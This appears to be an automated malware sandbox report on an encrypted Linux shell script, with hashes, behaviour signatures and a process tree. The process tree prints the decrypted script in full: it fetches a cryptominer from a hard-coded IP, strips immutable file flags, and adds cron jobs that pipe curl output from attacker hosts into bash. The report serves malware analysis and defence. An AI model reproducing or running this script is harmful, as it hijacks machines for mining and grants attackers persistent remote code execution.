Overview

overview

10

Static

static

10

样本/Lin...9DC1D8

ubuntu-18.04-amd64

7

样本/Lin...B36C5B

ubuntu-24.04-amd64

6

样本/Lin...E3B383

ubuntu-24.04-amd64

8

样本/Lin...6F5973

ubuntu-22.04-amd64

1

样本/Lin...776DB8

ubuntu-18.04-amd64

1

样本/Lin...776DB8

debian-9-armhf

1

样本/Lin...776DB8

debian-9-mips

1

样本/Lin...776DB8

debian-9-mipsel

1

样本/Lin...C9A3F7

ubuntu-18.04-amd64

6

样本/Lin...C9A3F7

debian-9-armhf

6

样本/Lin...C9A3F7

debian-9-mips

6

样本/Lin...C9A3F7

debian-9-mipsel

6

样本/Lin...FECBE5

ubuntu-22.04-amd64

10

1AAF1A9F78...31.tar

windows7-x64

1

1AAF1A9F78...31.tar

windows10-2004-x64

1

xrx/chattr

ubuntu-24.04-amd64

1

xrx/init.sh

ubuntu-22.04-amd64

6

xrx/init0

ubuntu-24.04-amd64

8

xrx/scp

ubuntu-18.04-amd64

1

xrx/scp

debian-9-armhf

1

xrx/scp

debian-9-mips

1

xrx/scp

debian-9-mipsel

1

xrx/secure

ubuntu-24.04-amd64

7

xrx/uninstall.sh

ubuntu-18.04-amd64

6

xrx/uninstall.sh

debian-9-armhf

6

xrx/uninstall.sh

debian-9-mips

6

xrx/uninstall.sh

debian-9-mipsel

6

xrx/xrx

ubuntu-18.04-amd64

6

Analysis

  • max time kernel
    10s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    26/11/2024, 12:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Score
7/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Attempts to change immutable files 4 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 2 IoCs
    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    1⤵
      PID:1510
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      1⤵
        PID:1510
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        1⤵
          PID:1510
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          1⤵
          • File and Directory Permissions Modification
          • Creates/modifies Cron job
          PID:1510
          • /usr/bin/pgrep
            pgrep xrx
            2⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:1512
          • /usr/bin/awk
            awk "{print \$5}"
            2⤵
              PID:1515
            • /bin/ls
              ls -l /var/tmp/.xrx/xrx
              2⤵
              • Reads runtime system information
              PID:1514
            • /bin/mkdir
              mkdir /var/tmp/.xrx
              2⤵
                PID:1516
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/xrx
                2⤵
                • Attempts to change immutable files
                PID:1517
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/config.json
                2⤵
                • Attempts to change immutable files
                PID:1518
              • /bin/rm
                rm -rf /var/tmp/.xrx/xrx
                2⤵
                  PID:1519
                • /bin/rm
                  rm -rf /var/tmp/.xrx/config.json
                  2⤵
                    PID:1520
                  • /usr/bin/curl
                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                    2⤵
                      PID:1521
                    • /usr/bin/wget
                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                      2⤵
                        PID:1523
                      • /usr/bin/curl
                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                        2⤵
                          PID:1527
                        • /usr/bin/wget
                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                          2⤵
                            PID:1529
                          • /bin/mv
                            mv config-xrx.json config.json
                            2⤵
                              PID:1530
                            • /bin/chmod
                              chmod +x /var/tmp/.xrx/xrx
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1531
                            • /bin/mkdir
                              mkdir /var/tmp/.xrx
                              2⤵
                                PID:1532
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/xrx
                                2⤵
                                • Attempts to change immutable files
                                PID:1533
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/config.json
                                2⤵
                                • Attempts to change immutable files
                                PID:1534
                              • /bin/rm
                                rm -rf /var/tmp/.xrx/xrx
                                2⤵
                                  PID:1535
                                • /bin/rm
                                  rm -rf /var/tmp/.xrx/config.json
                                  2⤵
                                    PID:1536
                                  • /usr/bin/curl
                                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                                    2⤵
                                      PID:1537
                                    • /usr/bin/wget
                                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                                      2⤵
                                        PID:1539
                                      • /usr/bin/curl
                                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                                        2⤵
                                          PID:1540
                                        • /usr/bin/wget
                                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                                          2⤵
                                            PID:1542
                                          • /bin/mv
                                            mv config-xrx.json config.json
                                            2⤵
                                              PID:1543
                                            • /bin/chmod
                                              chmod +x /var/tmp/.xrx/xrx
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1544
                                            • /bin/grep
                                              grep -q secure
                                              2⤵
                                                PID:1546
                                              • /bin/cat
                                                cat /etc/crontab
                                                2⤵
                                                  PID:1545
                                                • /bin/sleep
                                                  sleep 1
                                                  2⤵
                                                    PID:1548
                                                  • /var/tmp/.xrx/xrx
                                                    /var/tmp/.xrx/xrx
                                                    2⤵
                                                      PID:1547
                                                    • /usr/bin/pgrep
                                                      pgrep xrx
                                                      2⤵
                                                      • Reads CPU attributes
                                                      • Reads runtime system information
                                                      PID:1549

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads